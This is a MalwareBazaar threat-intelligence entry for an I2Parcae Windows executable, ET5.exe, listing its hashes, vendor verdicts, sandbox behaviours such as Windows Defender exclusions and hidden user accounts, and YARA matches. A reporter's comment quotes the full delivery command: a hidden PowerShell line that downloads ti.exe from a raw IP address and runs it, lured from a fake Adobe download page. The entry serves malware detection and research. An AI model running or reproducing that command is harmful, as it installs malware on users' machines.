MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


I2Parcae


Vendor detections: 10


Intelligence 10 IOCs YARA 14 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
SHA3-384 hash: 55b859069fab270026735832164615877ee53cf1162842dd6bc33c4481435317cedf4978b42859eb74963b4a1eb672f1
SHA1 hash: f88a8f1c1be4d07dafb27c65d36217eea4125020
MD5 hash: 98c7ec9eb9c760e176a78a01bcb9f91c
humanhash: glucose-july-green-four
File name:ET5.exe
Download: download sample
Signature I2Parcae
Create hunting rule
File size:17'157'120 bytes
First seen:2024-12-06 13:15:30 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 4f8fac411df99d6d54fbaf68fa03582e (1 x I2Parcae)
ssdeep 98304:H1ZlHoeoVRfsVhKgr4oC+64469EGG1vGP8PHHsfNOIGdQI:V7oeoTfsVoy4oC+6MEGC88Cp
TLSH T16E074BBB77A59168C16DC13BC0638F00E93370B94B37C2E757A9066C9E629C45E3EB25
TrID 68.4% (.CPL) Windows Control Panel Item (generic) (57583/11/19)
12.5% (.EXE) Win64 Executable (generic) (10522/11/4)
11.8% (.EXE) DOS Borland compiled Executable (generic) (10000/1/2)
2.4% (.EXE) OS/2 Executable (generic) (2029/13)
2.3% (.EXE) Generic Win/DOS Executable (2002/3)
Magika pebin
File icon (PE):PE icon
dhash icon bcf0e4d4d4dcd4d4 (7 x I2Parcae, 1 x Rhadamanthys, 1 x DeerStealer)
Reporter aachum
Tags:45-202-33-25 exe I2Parcae


Avatar
iamaachum
https://pc-softs.com/adobe-creative-cloud/ => (cmd /c start /min powershell $path='c:\users\public\ET5.exe';iwr http://45.202.33.25/her/ti.exe -outfile $path; start-process $path; start-process 'https://cutt.ly/2eXjaHtY';) => http://45.202.33.25/her/ti.exe

Intelligence

File Origin
# of uploads :
1
# of downloads :
392
Origin country :
ES ES
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
New Text Document.txt
Verdict:
Malicious activity
Analysis date:
2024-12-06 13:05:01 UTC
Tags:
loader evasion
Link:
https://app.any.run/tasks/82e23648-8aa8-4546-9edf-5ba5621f08a8

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
SecuriteInfo.com.FileRepMalware.15853.3225.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.1%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6752f91803fccedbc6497839
Tags:
shell virus sage
Result
Verdict:
Malware
Maliciousness:

Behaviour
Сreating synchronization primitives
Creating a window
Searching for synchronization primitives
Searching for the window
Restart of the analyzed sample
Connection attempt
Sending a custom TCP request
Creating a file in the %temp% directory
Launching cmd.exe command interpreter
Adding an exclusion to Microsoft Defender
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
adaptive-context embarcadero_delphi expand explorer fingerprint keylogger lolbin
Link:
https://www.filescan.io/uploads/6752f917aa7f098f77e7b9c7/reports/1fa336b7-bf04-4e0d-82d4-6728b5a71528/overview
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
Result
Verdict:
UNKNOWN
Verdict:
Unknown
Link:
https://analyze.intezer.com/analyses/0c03be68-f1a5-4daf-95a0-a61d53844d7a
Result
Threat name:
n/a
Detection:
malicious
Classification:
troj.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1570047
Signature
Adds a directory exclusion to Windows Defender
AI detected suspicious sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Multi AV Scanner detection for dropped file
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1570047 Sample: ET5.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 94 Antivirus detection for URL or domain 2->94 96 NDIS Filter Driver detected (likely used to intercept and sniff network traffic) 2->96 98 Contains functionality to hide user accounts 2->98 100 6 other signatures 2->100 8 main.exe 2->8         started        13 ET5.exe 3 2->13         started        15 ET5.exe 2->15         started        process3 dnsIp4 72 23.137.250.43 GTLAKESUS Reserved 8->72 74 102.130.123.16 xneeloZA South Africa 8->74 78 34 other IPs or domains 8->78 58 C:\Windows\Temp\ypqwg32t, PE32+ 8->58 dropped 60 C:\Windows\Temp\y8J74cEH, PE32+ 8->60 dropped 62 C:\Windows\Temp\rmcjgYnL, PE32+ 8->62 dropped 70 15 other files (13 malicious) 8->70 dropped 104 Contains functionality to hide user accounts 8->104 106 Found Tor onion address 8->106 76 45.202.33.26, 1128, 49704 ONL-HKOCEANNETWORKLIMITEDHK Seychelles 13->76 64 C:\...\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, PE32+ 13->64 dropped 66 C:\Users\...\hstmhco83f64lehv4q0wbzqj3o.exe, PE32+ 13->66 dropped 68 C:\Users\user\...\9pfntcc6fev7dp9x4dc.bat, DOS 13->68 dropped 17 cmd.exe 1 13->17         started        20 j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe 10 13->20         started        23 hstmhco83f64lehv4q0wbzqj3o.exe 3 13->23         started        file5 signatures6 process7 file8 80 Modifies Windows Defender protection settings 17->80 82 Adds a directory exclusion to Windows Defender 17->82 25 powershell.exe 23 17->25         started        28 powershell.exe 23 17->28         started        30 powershell.exe 21 17->30         started        32 conhost.exe 17->32         started        56 C:\Users\Public\...\main.exe, PE32+ 20->56 dropped 84 Contains functionality to hide user accounts 20->84 86 Machine Learning detection for dropped file 20->86 88 Found Tor onion address 20->88 34 taskkill.exe 1 20->34         started        36 sc.exe 1 20->36         started        38 sc.exe 20->38         started        40 4 other processes 20->40 90 Antivirus detection for dropped file 23->90 92 Multi AV Scanner detection for dropped file 23->92 signatures9 process10 signatures11 102 Loading BitLocker PowerShell Module 25->102 42 conhost.exe 34->42         started        44 conhost.exe 36->44         started        46 conhost.exe 38->46         started        48 conhost.exe 40->48         started        50 conhost.exe 40->50         started        52 conhost.exe 40->52         started        54 conhost.exe 40->54         started        process12
Score:
10%
Verdict:
Benign
File Type:
PE
Link:
https://malprob.io/report/e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4/
Threat name:
Win64.Trojan.Giant
Create hunting rule
Status:
Malicious
First seen:
2024-12-06 14:21:36 UTC
AV detection:
10 of 24 (41.67%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=4546pro7xibi6ylowtx4tbjdkypbstamxomrsku5vnjv7hlzg2sa._file
Result
Malware family:
n/a
Score:
  10/10
Tags:
discovery evasion execution persistence
Link:
https://tria.ge/reports/241206-qhsdtsyphz/
Behaviour
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Launches sc.exe
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Stops running service(s)
Suspicious use of NtCreateUserProcessOtherParentProcess
Verdict:
Malicious
Tags:
n/a
YARA:
n/a
Link:
https://app.threat.zone/submission/376810f4-28f6-478e-bbc0-2fd169fc0115
Unpacked files
SH256 hash:
e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
MD5 hash:
98c7ec9eb9c760e176a78a01bcb9f91c
SHA1 hash:
f88a8f1c1be4d07dafb27c65d36217eea4125020
Link:
https://www.unpac.me/results/ecb84f00-0314-4d4f-8604-952bf14a8eef/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:BitcoinAddress
Create hunting rule
Author:Didier Stevens (@DidierStevens)
Description:Contains a valid Bitcoin address
Rule name:Borland
Create hunting rule
Author:malware-lu
Rule name:cobalt_strike_tmp01925d3f
Create hunting rule
Author:The DFIR Report
Description:files - file ~tmp01925d3f.exe
Reference:https://thedfirreport.com
Rule name:DebuggerCheck__API
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:html_auto_download_b64
Create hunting rule
Author:Tdawg
Description:html auto download
Rule name:MD5_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:NET
Create hunting rule
Author:malware-lu
Rule name:pe_detect_tls_callbacks
Create hunting rule
Rule name:RansomPyShield_Antiransomware
Create hunting rule
Author:XiAnzheng
Description:Check for Suspicious String and Import combination that Ransomware mostly abuse(can create FP)
Rule name:Sus_Obf_Enc_Spoof_Hide_PE
Create hunting rule
Author:XiAnzheng
Description:Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

I2Parcae

Executable exe e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4

(this sample)

anyrun
any.run
https://app.any.run/tasks/82e23648-8aa8-4546-9edf-5ba5621f08a8
anyrun
any.run
https://app.any.run/tasks/420fd200-f383-46a8-8bd0-e9804f189b47
  
Link
https://tria.ge/241206-qfb9tsvlen/
  
Delivery method
Distributed via web download

BLint

The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.

Findings
IDTitleSeverity
CHECK_AUTHENTICODEMissing Authenticodehigh
CHECK_NXMissing Non-Executable Memory Protectioncritical
CHECK_PIEMissing Position-Independent Executable (PIE) Protectionhigh
Reviews
IDCapabilitiesEvidence
COM_BASE_APICan Download & Execute componentsole32.dll::CoCreateInstance
ole32.dll::CreateStreamOnHGlobal
MULTIMEDIA_APICan Play Multimediagdi32.dll::StretchDIBits
winmm.dll::timeGetTime
SHELL_APIManipulates System Shellshell32.dll::ShellExecuteW
WIN32_PROCESS_APICan Create Process and Threadskernel32.dll::CloseHandle
kernel32.dll::CreateThread
WIN_BASE_APIUses Win Base APIkernel32.dll::LoadLibraryExW
kernel32.dll::LoadLibraryA
kernel32.dll::LoadLibraryW
kernel32.dll::GetDriveTypeW
kernel32.dll::GetVolumeInformationW
kernel32.dll::GetSystemInfo
WIN_BASE_IO_APICan Create Fileskernel32.dll::CopyFileW
kernel32.dll::CreateDirectoryW
kernel32.dll::CreateFileMappingW
kernel32.dll::CreateFileW
kernel32.dll::DeleteFileW
kernel32.dll::GetSystemDirectoryW
WIN_BASE_USER_APIRetrieves Account Informationkernel32.dll::GetComputerNameW
kernel32.dll::QueryDosDeviceW
WIN_REG_APICan Manipulate Windows Registryadvapi32.dll::RegConnectRegistryW
advapi32.dll::RegCreateKeyExW
advapi32.dll::RegDeleteKeyW
advapi32.dll::RegLoadKeyW
advapi32.dll::RegOpenKeyExW
advapi32.dll::RegQueryInfoKeyW
WIN_USER_APIPerforms GUI Actionsuser32.dll::ActivateKeyboardLayout
user32.dll::AppendMenuW
user32.dll::CreateMenu
user32.dll::EmptyClipboard
user32.dll::FindWindowExW
user32.dll::FindWindowW

Comments